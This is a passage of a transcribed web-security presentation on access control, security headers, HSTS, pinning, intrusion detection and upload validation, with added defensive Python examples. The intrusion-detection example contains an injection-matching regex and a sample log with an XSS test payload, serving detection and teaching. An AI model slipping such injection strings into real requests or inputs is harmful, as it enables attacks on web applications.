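        return False        # a cross-site POST carries the cookie but never the form half
    expected = _mac(key, cookie_token, session_user)
    return hmac.compare_digest(expected.encode(), form_token.encode())


def validate_form_post(cookies: Dict[str, str], form: Dict[str, str],
                       session_user: str, key: bytes = DEMO_CSRF_KEY) -> bool:
    return tokens_valid(cookies.get(COOKIE_NAME, ""), form.get(COOKIE_NAME, ""),
                        session_user, key)


def validate_ajax_request(cookies: Dict[str, str], headers: Dict[str, str],
                          session_user: str, key: bytes = DEMO_CSRF_KEY) -> bool:
    """The slide's AJAX variant: header 'RequestVerificationToken: <cookie>:<form>'."""
    cookie_part, sep, form_part = headers.get("RequestVerificationToken", "").partition(":")
    if not sep:
        return False
    # The cookie half quoted in the header must be the cookie the browser actually sent.
    if not hmac.compare_digest(cookie_part.encode(), cookies.get(COOKIE_NAME, "").encode()):
        return False
    return tokens_valid(cookie_part, form_part, session_user, key)
```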
66. • Authorization: The process where a system determines whether a specific user has access to a resource
• Permission: Represents app behavior only
• Entitlement: What a user is actually allowed to do
• Principal/User: Who/what you are entitling
• Implicit Role: Named permission, user associated
– if (user.isRole("Manager"))
• Explicit Role: Named permission, resource associated
– if (user.isAuthorized("report:view:3324"))
What is Access Control
67. • Hard-coded role checks in application code
• Lack of centralized access control logic
• Untrusted data driving access control decisions
• Access control that is “open by default”
• Lack of addressing horizontal access control in a standardized way (if at all)
• Access control logic that needs to be manually added to every endpoint in code
• Access Control that is “sticky” per session
• Access Control that requires per-user policy
Access Control DON'Ts
68. • Vertical Access Control Attacks
– A standard user accessing administration functionality
• Horizontal Access Control Attacks
– Same role, but accessing another user's private data
• Business Logic Access Control Attacks
– Abuse of one or more linked activities that collectively realize a business objective
Attacks on Access Control
69. • Loss of accountability
– Attackers maliciously execute actions as other users
– Attackers maliciously execute higher level actions
• Disclosure of confidential data
– Compromising admin-level accounts often results in access to user’s confidential data
• Data tampering
– Privilege levels do not distinguish users who can only view data and users permitted to modify data
Impact of poor Access Control
70. • Apache Shiro is a powerful and easy to use Java security framework
• Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management
• Built on sound interface-driven design and OO principles
• Enables custom behavior
• Sensible and secure defaults for everything
Apache SHIRO
http://shiro.apache.org/
71. Web Application needs secure access control mechanism
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
    log.info("You may use a lightsaber ring. Use it wisely.");
} else {
    log.info("Sorry, lightsaber rings are for schwartz masters only.");
}
Problem
Solution
Solving real world Access Control problems
72. int winnebagoId = request.getInt("winnebago_id");
if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) {
    log.info("You are permitted to 'drive' the 'winnebago'. Here are the keys.");
} else {
    log.info("Sorry, you aren't allowed to drive this winnebago!");
}
Solving real world Access Control problems
Web Application needs secure access to a specific object
Problem
Solution
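One added example (my code, not Shiro's and not the IDOR slide's) that serves both slide 41 and slides 71 and 72: a per-session indirect reference map, and a Shiro-style wildcard permission matcher doing the per-object check once the GUID has been translated back to the direct id. The customer table is constructed.

```python
import uuid
from typing import Dict, Iterable, Optional

# Constructed stand-in for the customer table.
CUSTOMERS = {101: "Ada", 102: "Grace", 103: "Linus"}


class IndirectReferenceMap:
    """Per-session map between opaque GUIDs shown to the client and real row ids.

    A GUID minted in one session resolves to nothing in any other session, so a
    user who edits the id in the request only ever gets 'not found'.
    """

    def __init__(self) -> None:
        self._to_direct: Dict[str, int] = {}
        self._to_indirect: Dict[int, str] = {}

    def get_indirect_reference(self, direct_id: int) -> str:
        ref = self._to_indirect.get(direct_id)
        if ref is None:
            ref = str(uuid.uuid4())
            self._to_indirect[direct_id] = ref
            self._to_direct[ref] = direct_id
        return ref

    def get_direct_reference(self, indirect_id: str) -> Optional[int]:
        return self._to_direct.get(indirect_id)


def implies(granted: str, requested: str) -> bool:
    """Shiro-style wildcard permissions: parts split on ':', alternatives on ',',
    '*' matches a whole part, and a shorter granted string covers every deeper part."""
    g = [set(p.split(",")) for p in granted.split(":")]
    r = [set(p.split(",")) for p in requested.split(":")]
    for i, want in enumerate(r):
        if i >= len(g):
            return True                      # e.g. "winnebago" implies "winnebago:drive:42"
        if "*" not in g[i] and not want <= g[i]:
            return False
    return all(have == {"*"} for have in g[len(r):])  # extra granted parts must be wildcards


def is_permitted(user_permissions: Iterable[str], requested: str) -> bool:
    return any(implies(p, requested) for p in user_permissions)


def get_customer(session_map: IndirectReferenceMap, user_permissions: Iterable[str],
                 indirect_id: str) -> Optional[str]:
    """Slide 41's GetCustomer with slide 72's per-object check: translate the GUID back
    to the direct id, then ask for 'customer:view:<id>' before returning anything."""
    customer_id = session_map.get_direct_reference(indirect_id)
    if customer_id is None:
        return None                          # unknown or foreign reference: fail closed
    if not is_permitted(user_permissions, "customer:view:%d" % customer_id):
        return None                          # same answer as 'not found': no oracle
    return CUSTOMERS.get(customer_id)
```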
73. “GET” exposes sensitive authentication information in the URL
– In Web Server and Proxy Server logs
– In the http referer header
– In Bookmarks/Favorites often emailed to others
“POST” places information in the body of the request and not the URL
Enforce HTTPS POST For Sensitive Data Transport
HTTP: POST vs GET
77. Fixes mime sniffing attacks
Only applies to IE
X-Content-Type-Options: nosniff
X-Content-Type-Options
78. • Anti-XSS W3C standard http://www.w3.org/TR/CSP/
• Move all inline script and style into external files
• Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use
• Define a policy for the site regarding loading of content
• Chrome version 25 and later (50%)
• Firefox version 23 and later (30%)
• Internet Explorer version 10 and later (10%)
Content Security Policy
79. Add the following as part of your HTTP Response
Cache-Control: no-store, no-cache, must-revalidate
Expires: -1
Disabling the browser cache
80. Application Layer Intrusion Detection
• Great detection points to start with
– Input validation failure server side when client side validation exists
– Input validation failure server side on non-user editable parameters (hidden fields, checkboxes, radio buttons or select lists)
– Forced browsing to common attack entry points e.g., /admin/secretlogin.jsp or honeypot URL (a fake path listed in /robots.txt)
81. Application Layer Intrusion Detection
• Others
– Blatant SQLi or XSS injection attacks
– Workflow sequence abuse (e.g. multi-part form in wrong order)
– Custom business logic (e.g. basket vs catalogue price mismatch)
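The detection points from slides 80 and 81 run over a constructed request log, as an added example that is my code and not AppSensor's; the detection point names are mine, not AppSensor's identifiers, and the honeypot paths and field lists are assumed site knowledge.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Assumed site knowledge (constructed): honeypot paths are listed as Disallow in
# /robots.txt but never linked, so only a scanner or someone probing the site hits them.
HONEYPOT_PATHS = {"/admin/secretlogin.jsp", "/backup/"}
NON_USER_EDITABLE = {"user_id", "price"}      # hidden fields / fixed selects
CLIENT_VALIDATED = {"email", "qty"}           # fields the browser already validates
BLATANT = re.compile(r"<script|'\s*or\s+1\s*=\s*1|union\s+select", re.IGNORECASE)
CHECKOUT_STEP = re.compile(r"^/checkout/step(\d+)$")

# Constructed request log. "invalid" lists the parameters the application's own
# server-side validator rejected for that request.
REQUEST_LOG = [
    {"user": "alice", "path": "/checkout/step1", "params": {}, "invalid": []},
    {"user": "alice", "path": "/checkout/step2", "params": {"qty": "2"}, "invalid": []},
    {"user": "mallory", "path": "/checkout/step3", "params": {"price": "0.01"}, "invalid": []},
    {"user": "mallory", "path": "/profile", "params": {"user_id": "7", "email": "m@x"},
     "invalid": ["user_id"]},
    {"user": "mallory", "path": "/admin/secretlogin.jsp", "params": {}, "invalid": []},
    {"user": "bob", "path": "/search", "params": {"q": "<script>alert(1)</script>"}, "invalid": []},
]

Detection = Tuple[str, str, str]   # (user, detection point, detail)


def detect(events: List[Dict]) -> List[Detection]:
    hits: List[Detection] = []
    furthest_step: Dict[str, int] = defaultdict(int)
    for ev in events:
        user, path, params = ev["user"], ev["path"], ev["params"]
        if path in HONEYPOT_PATHS:
            hits.append((user, "forced_browsing", path))
        for name in ev.get("invalid", []):
            if name in NON_USER_EDITABLE:
                hits.append((user, "tampered_fixed_param", name))  # no browser sends this
            elif name in CLIENT_VALIDATED:
                hits.append((user, "bypassed_client_validation", name))
        for name, value in params.items():
            if BLATANT.search(value):
                hits.append((user, "blatant_injection", name))
        m = CHECKOUT_STEP.match(path)
        if m:
            step = int(m.group(1))
            if step > furthest_step[user] + 1:       # skipped ahead in the multi-step flow
                hits.append((user, "workflow_out_of_order", path))
            furthest_step[user] = max(furthest_step[user], step)
    return hits


def users_to_lock(hits: List[Detection], threshold: int = 2) -> List[str]:
    """Response policy: users reaching the threshold get locked or re-authenticated."""
    counts = Counter(user for user, _, _ in hits)
    return sorted(user for user, n in counts.items() if n >= threshold)
```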
82. OWASP AppSensor (Java)
• Project and mailing list
https://www.owasp.org/index.php/OWASP_AppSensor_Project
• Four-page briefing, Crosstalk, Journal of Defense Software Engineering
• http://www.crosstalkonline.org/storage/issue-archives/2011/201109/201109-Watson.pdf
83. Encryption in transit
• Confidentiality, Integrity (in Transit) and Authenticity
– Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL
– Starting when the login form is rendered until logout is complete
• HTTPS configuration best practices
– https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• HSTS (Strict Transport Security)
– http://www.youtube.com/watch?v=zEV3HOuM_Vw
– Strict-Transport-Security: max-age=31536000
• Certificate Pinning
– https://www.owasp.org/index.php/Pinning_Cheat_Sheet
84. Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000; includeSubdomains
Strict Transport Security (HSTS)
// in global.asax
protected void Application_BeginRequest(Object sender, EventArgs e)
{
    switch (Request.Url.Scheme)
    {
        case "https":
            Response.AddHeader("Strict-Transport-Security", "max-age=31536000");
            break;
        case "http":
            var path = "https://" + Request.Url.Host + Request.Url.PathAndQuery;
            Response.Status = "301 Moved Permanently";
            Response.AddHeader("Location", path);
            break;
    }
}
85. • What is Pinning
– Pinning is a key continuity scheme
– Detect when an imposter with a fake but CA validated certificate attempts to act like the real server
• 2 Types of pinning
• Carry around a copy of the server’s public key;
– Great if you are distributing a dedicated client-server application since you know the server’s certificate or public key in advance
• Note of the server’s public key on first use (Trust-on-First-Use, Tofu)
– Useful when no a priori knowledge exists, such as SSH or a Browser
• https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Certificate Pinning
86. File Upload Security
• Upload Verification
– Filename and Size validation + antivirus
• Upload Storage
– Use only trusted filenames + separate domain
• Beware of "special" files
– "crossdomain.xml" or "clientaccesspolicy.xml".
• Image Upload Verification
– Enforce proper image size limits
– Use image rewriting libraries
– Set the extension of the stored image to be a valid image extension
– Ensure the detected content type of the image is safe
• Generic Upload Verification
– Ensure decompressed size of file < maximum size
– Ensure that an uploaded archive matches the type expected (zip, rar)
– Ensure structured uploads such as an add-on follow proper standard
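The verification steps above as an added example (my code, not from the presentation): a trusted random filename with the extension taken from the sniffed content, the "special" filenames rejected, and an archive check that measures the decompressed size while reading and refuses entries that escape the target directory. The sample image and archive bytes are constructed inline; only zip is handled since the standard library has no rar support.

```python
import io
import os
import uuid
import zipfile
from typing import Dict, Optional, Tuple

MAX_UPLOAD_BYTES = 5 * 1024 * 1024
MAX_DECOMPRESSED_BYTES = 20 * 1024 * 1024
SPECIAL_NAMES = {"crossdomain.xml", "clientaccesspolicy.xml"}
IMAGE_SIGNATURES = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg",
                    b"GIF87a": "gif", b"GIF89a": "gif"}
# Constructed sample: PNG signature plus padding, enough for the sniffing check.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def sniff_image_type(data: bytes) -> Optional[str]:
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def check_image_upload(client_filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, stored_name_or_reason). The stored name is random and takes
    its extension from the detected content, never from what the client claimed."""
    base = os.path.basename(client_filename.replace("\\", "/"))  # drop client-sent path
    if base.lower() in SPECIAL_NAMES:
        return False, "special filename rejected"
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    detected = sniff_image_type(data)
    if detected is None:
        return False, "content is not a supported image"
    claimed = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if claimed == "jpeg":
        claimed = "jpg"
    if claimed != detected:
        return False, "extension %r does not match detected type %r" % (claimed, detected)
    return True, "%s.%s" % (uuid.uuid4().hex, detected)


def check_zip_upload(data: bytes) -> Tuple[bool, str]:
    """Archive checks: really a zip, no entry escapes the target directory, and the
    decompressed total is measured while reading (header sizes cannot be trusted)."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return False, "not a zip archive"
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            parts = info.filename.replace("\\", "/").split("/")
            if info.filename.startswith(("/", "\\")) or ".." in parts:
                return False, "path traversal in entry %r" % info.filename
            with zf.open(info) as fh:
                while True:
                    chunk = fh.read(65536)
                    if not chunk:
                        break
                    total += len(chunk)
                    if total > MAX_DECOMPRESSED_BYTES:
                        return False, "decompressed size exceeds limit"
    return True, "decompressed %d bytes" % total


def build_demo_zip(entries: Dict[str, str]) -> bytes:
    """Constructed archive for the demonstration (entry name -> contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()
```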